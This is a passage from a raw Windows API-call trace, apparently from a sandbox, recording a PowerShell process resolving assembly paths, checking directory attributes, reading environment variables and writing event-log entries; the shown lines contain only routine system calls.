lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.888] GetLastError () returned 0xcb [0141.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.888] GetLastError () returned 0xcb [0141.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.888] GetLastError () returned 0xcb [0141.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0141.888] GetLastError () returned 0xcb [0141.940] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.940] GetLastError () returned 0x3 [0141.940] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.941] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34d983c*="Certificate", lpRawData=0x34d96f8) returned 1 [0141.941] GetLastError () returned 0x0 [0141.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.947] GetLastError () returned 0xcb [0141.954] GetLogicalDrives () returned 0x4 [0141.954] GetLastError () returned 0xcb [0141.954] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25e04c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.955] GetLastError () returned 0xcb [0141.955] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.955] GetLastError () returned 0xcb [0141.955] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2e48d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.955] GetLastError () returned 0xcb [0141.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.956] GetLastError () returned 0xcb [0141.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.956] GetLastError () returned 0xcb [0141.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.972] GetLastError () returned 0xcb [0141.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25de94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.975] GetLastError () returned 0xcb [0141.975] SetErrorMode (uMode=0x1) returned 0x1 [0141.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x34e075c | out: lpFileInformation=0x34e075c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0141.975] GetLastError () returned 0xcb [0141.975] SetErrorMode (uMode=0x1) returned 0x1 [0141.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.975] GetLastError () returned 0xcb [0141.975] SetErrorMode (uMode=0x1) returned 0x1 [0141.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x34e08f0 | out: lpFileInformation=0x34e08f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0141.975] GetLastError () returned 0xcb [0141.975] SetErrorMode (uMode=0x1) returned 0x1 [0141.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.981] GetLastError () returned 0xcb [0141.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.996] GetLastError () returned 0xcb [0141.997] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.997] GetLastError () returned 0xcb [0141.997] SetErrorMode (uMode=0x1) returned 0x1 [0141.997] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.997] GetLastError () returned 0xcb [0141.997] SetErrorMode (uMode=0x1) returned 0x1 [0141.997] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.997] GetLastError () returned 0xcb [0141.997] SetErrorMode (uMode=0x1) returned 0x1 [0141.997] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0141.997] GetLastError () returned 0xcb [0141.997] SetErrorMode (uMode=0x1) returned 0x1 [0141.998] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.998] GetLastError () returned 0xcb [0141.998] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0141.998] GetLastError () returned 0xcb [0141.998] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0141.998] GetLastError () returned 0xcb [0141.998] SetErrorMode (uMode=0x1) returned 0x1 [0141.998] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0141.998] GetLastError () returned 0xcb [0141.998] SetErrorMode (uMode=0x1) returned 0x1 [0141.998] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0141.998] GetLastError () returned 0xcb [0141.998] SetErrorMode (uMode=0x1) returned 0x1 [0141.998] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0141.998] GetLastError () returned 0xcb [0141.998] SetErrorMode (uMode=0x1) returned 0x1 [0141.998] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0141.998] GetLastError () returned 0xcb [0141.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x25df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0141.998] GetLastError () returned 0xcb [0141.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.998] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0141.999] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0141.999] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0141.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.999] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0141.999] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x25e3e0 | out: lpFileInformation=0x25e3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0141.999] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0141.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.999] GetLastError () returned 0xcb [0141.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x25df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0141.999] GetLastError () returned 0xcb [0141.999] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0141.999] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0141.999] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x25e3ec | out: lpFileInformation=0x25e3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0141.999] GetLastError () returned 0xcb [0141.999] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x25e3ec | out: lpFileInformation=0x25e3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x25df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0142.000] GetLastError () returned 0xcb [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x25df1c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0142.000] GetLastError () returned 0xcb [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x25e3ec | out: lpFileInformation=0x25e3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x25e3ec | out: lpFileInformation=0x25e3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0142.000] GetLastError () returned 0xcb [0142.000] SetErrorMode (uMode=0x1) returned 0x1 [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25df80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0142.000] GetLastError () returned 0xcb [0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x25df1c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0142.000] GetLastError () returned 0xcb [0142.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x25e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0142.004] GetLastError () returned 0xcb [0142.004] SetErrorMode (uMode=0x1) returned 0x1 [0142.004] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x34e8698 | out: lpFileInformation=0x34e8698*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0142.004] GetLastError () returned 0xcb [0142.004] SetErrorMode (uMode=0x1) returned 0x1 [0142.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e084, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.005] GetLastError () returned 0xcb [0142.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.005] GetLastError () returned 0xcb [0142.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.005] GetLastError () returned 0xcb [0142.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.005] GetLastError () returned 0xcb [0142.039] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e5d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e5d8) returned 0x1 [0142.039] GetLastError () returned 0xcb [0142.039] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e5e0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e5e0) returned 1 [0142.040] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc8158*="Available", lpRawData=0x2dc8014) returned 1 [0142.041] GetLastError () returned 0x0 [0142.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.041] GetLastError () returned 0xcb [0142.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.042] GetLastError () returned 0xcb [0142.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.052] GetLastError () returned 0xcb [0142.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.052] GetLastError () returned 0xcb [0142.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.052] GetLastError () returned 0xcb [0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.055] GetLastError () returned 0xcb [0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.055] GetLastError () returned 0xcb [0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.055] GetLastError () returned 0xcb [0142.055] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0142.055] GetLastError () returned 0xcb [0142.055] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0142.055] GetLastError () returned 0xcb [0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.055] GetLastError () returned 0xcb [0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.055] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: 